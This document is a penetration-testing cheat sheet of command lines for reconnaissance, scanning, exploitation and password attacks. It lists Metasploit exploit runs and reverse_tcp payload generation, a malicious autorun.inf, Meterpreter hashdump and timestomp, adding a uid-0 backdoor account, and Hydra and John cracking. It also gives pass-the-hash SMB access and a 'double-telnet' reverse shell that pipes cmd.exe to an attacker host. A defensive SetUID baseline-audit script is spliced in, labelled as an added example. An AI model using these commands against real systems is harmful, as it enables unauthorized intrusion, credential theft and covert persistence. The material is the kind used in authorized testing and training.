whois

$ whois [-h whois_server] name

nslookup

$ nslookup <host>

dig

  • Types of record: NS, A, HINFO, MX, TXT, CNAME, SOA, RP, PTR, SRV

$ dig [@server] <name> [type]
  • Zone transfer

$ dig [@server] <domain> -t AXFR
  • Incremental zone transfer (IXFR), from a given zone serial

$ dig [@server] <domain> -t IXFR=<serial>

BiLE.pl

$ ./BiLE.pl
$ ./BiLE-weigh.pl
$ ./tld-expand.pl
$ ./vet-IPrange.pl
$ ./qtrace.pl

snmpwalk

Dump the ARP table of an SNMP agent at HOST (read community string required)

$ snmpwalk -v 2c -c <community> <host> ip.ipNetToMediaTable.ipNetToMediaEntry.ipNetToMediaPhysAddress > arptable.dump

Scanning

tcpdump

Parameters

  • -n -- numeric output (don't resolve hostnames or port names)

  • -i <interface>

  • -v -- be verbose

  • -r <file>/-w <file> -- read from/write to file

  • -x -- print hex

  • -A -- print ASCII

  • -X -- print hex and ASCII

  • -s <snaplen> -- length to capture (-s0 for all data)

Filter string

  • Protocol

    • ether, ip, ip6, arp, rarp, tcp, udp

  • Type

    • host <host>

    • net <network>

    • port <portnum>

    • portrange <start-end>

  • Direction

    • src

    • dst

  • Logic

    • and

    • or

  • Show TCP against target 10.10.10.10 in ASCII

tcpdump [-i tap0] -n -A tcp and dst 10.10.10.10

  • Show all UDP from 10.10.10.10

tcpdump [-i tap0] -n udp and src 10.10.10.10

  • Show all TCP port 80 packets going to or from host 10.10.10.10

tcpdump [-i tap0] -n tcp and port 80 and host 10.10.10.10

hping3

TCP Flags

  • --syn, --fin, --rst, --push, --ack, --urg

Target selection

  • --rand-dest

  • --interface <int>

Source selection

  • --spoof <hostname>

  • --rand-source

Port selection

  • --destport <port>

  • --destport +<port> -- increment by one for each packet received

  • --destport ++<port> -- increment by one for each packet sent

  • --scan <portrange>

  • --baseport <port>

  • --keep -- don't increment the source port

Speed options

  • --fast, --faster, --flood

  • --interval <N> -- interval in seconds

  • --interval u<N> -- interval in microseconds

Other options

  • --count <N>

  • --beep

  • --file <filename>

  • --data <N>

traceroute

Parameters

  • -f <N> -- Initial TTL

  • -g <hostlist> -- Loose source route

  • -I -- use ICMP Echo instead of UDP

  • -m <N> -- maximum number of hops (default 30)

  • -n -- numeric

  • -p <baseport> -- set the base UDP port

  • -w <N> -- wait N seconds (default 5)

Layer Four Traceroute (lft)

Options

  • -u -- use UDP

  • -p -- use ICMP echo

  • -d <port> -- destination port (default 80)

  • -s <port> -- source port

  • -L <N> -- length (including layer 3/4 header)

  • -A -- look up AS number

  • -P -- traceroute via tcp

nmap

Pinging

  • -PN -- don't ping

  • -PB -- default, ICMP Echo + TCP to port 80

  • -PE -- ICMP Echo request

  • -PS[portlist] -- TCP SYN

  • -PP -- ICMP Timestamp request

  • -PM -- ICMP Address Mask request

  • -PR -- default on subnet, use ARP to identify hosts

Scanning

  • -sT -- TCP Connect scan

  • -sS -- SYN scan

  • -sA -- ACK scan

  • -sF -- FIN scan

  • -sN -- Null scan

  • -sX -- Xmas Tree scan

  • -sM -- Maimon scan

  • --scanflags specify your own flags

  • -sU -- UDP scan

Fingerprinting

  • -O -- OS fingerprint

  • -sV -- Version scan

Scripts

  • -sC -- run all scripts

  • --script=<category,dir,script,etc>

  • --script-trace

Timing

  • --paranoid, --sneaky, --polite, --normal, --aggressive, --insane

  • --host_timeout, --max_rtt_timeout, --min-rtt-timeout, --initial_rtt_timeout, --max-parallelism, --scan_delay

Other options

  • -p<ports>

  • -F -- fast (checks only ports in nmap-services)

  • --packet-trace

  • --traceroute

  • --badsum

THC amap

Options

  • -q -- quiet (omit closed ports)

  • -v -- verbose

  • -b -- print banners

Example:

amap -bqv 10.10.10.10 1-50

Enumerating users

Commands

$ cat /etc/passwd
$ finger
$ who
$ w

Remotely:

$ finger @<host>

Exploitation

netcat

Options

  • -l -- listen mode

  • -L -- listen harder (Windows only)

  • -u -- UDP mode

  • -p -- local port (in listen mode, the port to listen on)

  • -e -- program to execute

  • -n -- don't resolve names

  • -z -- don't send any data

  • -w <N> -- timeout for connects

  • -v/-vv -- be verbose

Scanning

echo "" | nc -v -n -w1 <host> <startport>-<endport>

Setting up a relay

mknod backpipe p
nc -l -p <localport> < backpipe | nc <remotehost> <remoteport> > backpipe

Relaying port 22 to the local system

mknod backpipe p
nc -l -p <localport> < backpipe | nc localhost 22 > backpipe

Finding SetUID/SetGID programs

find / -type f \( -perm -4000 -o -perm -2000 \) -print
find /bin -type f \( -perm -4000 -o -perm -2000 \) -print
find /sbin -type f \( -perm -4000 -o -perm -2000 \) -print
find /usr/bin -type f \( -perm -4000 -o -perm -2000 \) -print
find /usr/sbin -type f \( -perm -4000 -o -perm -2000 \) -print
find /usr/local/bin -type f \( -perm -4000 -o -perm -2000 \) -print
find /usr/local/sbin -type f \( -perm -4000 -o -perm -2000 \) -print
for i in `locate -r "bin$"`; do find $i -type f \( -perm -4000 -o -perm -2000 \) -print; done
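The same find expression turned into a baseline audit, as an added example that is not part of the original cheat sheet: the functions below list SetUID/SetGID files under given roots, save that list, and later report any privileged file that was not in the saved baseline (the function names and the use of mktemp/comm are this example's own assumptions).

```shell
#!/bin/sh
# Added example, not from the original cheat sheet: audit SetUID/SetGID
# files under the given roots and diff the result against a saved baseline,
# so a newly appeared privileged binary stands out during a review.
# Assumes only POSIX find, sort, comm and mktemp.

# List SetUID/SetGID regular files under the given roots, sorted, one per line.
# -xdev keeps the walk on one filesystem so /proc and network mounts are skipped.
list_privileged() {
    find "$@" -xdev -type f \( -perm -4000 -o -perm -2000 \) -print 2>/dev/null | sort
}

# Save the current listing as the baseline to compare against later.
save_baseline() {
    baseline="$1"; shift
    list_privileged "$@" > "$baseline"
}

# Print privileged files present now but absent from the baseline.
# Returns 0 when nothing new was found, 1 when at least one new file appeared.
new_since_baseline() {
    baseline="$1"; shift
    current=$(mktemp)
    list_privileged "$@" > "$current"
    added=$(comm -13 "$baseline" "$current")
    rm -f "$current"
    if [ -n "$added" ]; then
        printf '%s\n' "$added"
        return 1
    fi
    return 0
}
```

Run `save_baseline /var/lib/privaudit/baseline.txt /` once on a known-good system, then `new_since_baseline /var/lib/privaudit/baseline.txt /` from cron; a non-zero exit is the signal to investigate.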

Metasploit

Running an exploit

msf> show exploits
msf> use exploit/windows/smf/ms05_039_php
msf> show payloads
msf> set PAYLOAD windows/shell/bind_tcp
msf> show options
msf> set RHOST 10.10.10.10
msf> exploit

Interacting with sessions

msf> sessions -l
msf> sessions -i <id>

Creating a malicious VBScript

$ msfpayload windows/meterpreter/reverse_tcp LHOST=<ip> V
$ msfpayload windows/vncinject/reverse_tcp LHOST=<ip> DisableCourtesyShell=y V

Creating a malicious Exe

$ msfpayload windows/meterpreter/reverse_tcp LHOST=<ip> X
$ msfpayload windows/vncinject/reverse_tcp LHOST=<ip> DisableCourtesyShell=y X

Example autorun.inf file to run a malicious exe (goes with Metasploit)

[autorun]
open=example.exe
icon=example.exe

Metasploit listener

$ msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=<ip> E
$ msfcli multi/handler PAYLOAD=windows/vncinject/reverse_tcp LHOST=<ip> DisableCourtesyShell=y E

Meterpreter

Filesystem commands

> cd
> lcd
> pwd / getwd
> ls
> cat
> download / upload
> mkdir / rmdir
> edit
> getpid
> getuid
> ps
> kill
> execute
> migrate
> ipconfig
> portfwd
> route
> idletime
> uictl

Modules

> use <module>
> use priv
> hashdump
> timestomp

Creating a user

Adding an ordinary user

useradd <username>

Adding a root user (note: a non-uid-0 account may be required to log in)

useradd -o -u 0 <username>

telnet

Checking for inetd/xinetd

ps aux | grep inetd

Adding telnet to /etc/inetd

telnet stream tcp nowait root /usr/sbin/tcpd in.telnetd

Adding telnet to xinetd

  • Steal the file from a service that's running (files are in /etc/xinetd.d)

  • Change server to "/usr/sbin/in.telnetd"

Restarting inetd/xinetd (the "kill" command with the PID can also be used)

killall -HUP inetd
killall -HUP xinetd

sshd

File should be in /etc/rc*. Ways to enable:

chkconfig sshd on
service sshd start
/etc/init.d/sshd start

Passwords

Dictionaries

Creating a dictionary

cat wordlist.txt | sort | uniq > dictionary.txt

Scraping a Web site

mkdir /tmp/source
cd /tmp/source
wget -r -l <depth> <url>
cd ..
grep -h -r "" source | tr '[:space:]' '\n' | grep -v '<' | sort | uniq > wordlist.lst

Or, just use 

Account lockout

grep tally /etc/pam.d/*
grep tally /etc/pam.conf

pw-inspector

Options

  • -i -- input file

  • -o -- output file

  • -m <N> -- minimum length

  • -M <N> -- maximum length

  • -c <N> -- the number of criteria

    • -l -- lower case

    • -u -- upper case

    • -n -- numbers

    • -p -- printable characters (lower/upper/num)

    • -s -- special characters (all others)

Example

cat /tmp/password.list | pw-inspector -m 6 -n -u -l -c 2

Hydra

Options

  • -l <username>/-L <userfile> -- Login name/file

  • -p <password>/-P <passfile> -- Password/file

  • -e <n|s|ns> -- extended checks (n = null, s = same as username)

  • -t <N> -- thread count

hydra <host> <service> <-l <username>|-L <userfile>> <-p <password>|-P <passfile>> [-e <n|s|ns>] [-t <N>]

smb password

hydra <host> smb -l george -P ./list.lst -e ns

ssh password

hydra <host> ssh2 -l george -P ./list.lst -e ns

John

Show cracked passwords

john --show <passfile>

Speed test

john --test

Running against a password file

john <passfile>

Specifying the hash type

john --format=<type> <passfile>
john --format=nt /tmp/pwdump

Combining passwd/shadow

unshadow <passwd file> <shadow file> > combined.txt
john combined.txt

Modified Samba

Loading the hash

export SMBHASH="<LM hash>:<NT hash>"
echo $SMBHASH

Mounting a drive

./smbmount //<host>/<share> <mountpoint> -o username=<user>
./smbmount //10.10.10.10/c$ /mnt/target -o username=administrator

Adding a user

./net user ADD <username> <password> -I <host> -U <adminuser>
./net rpc group ADDMEM administrators <username> -I <host> -U <adminuser>

Web

nikto.pl

Scanning

nikto.pl -h <host>

Updating

nikto.pl -update

Single check

nikto.pl -Single

Fancy tricks

Double-telnet

On the attacker machine

nc -l -p 4444
nc -l -p 5555

On the victim machine

telnet <attacker> 4444 | cmd.exe | telnet <attacker> 5555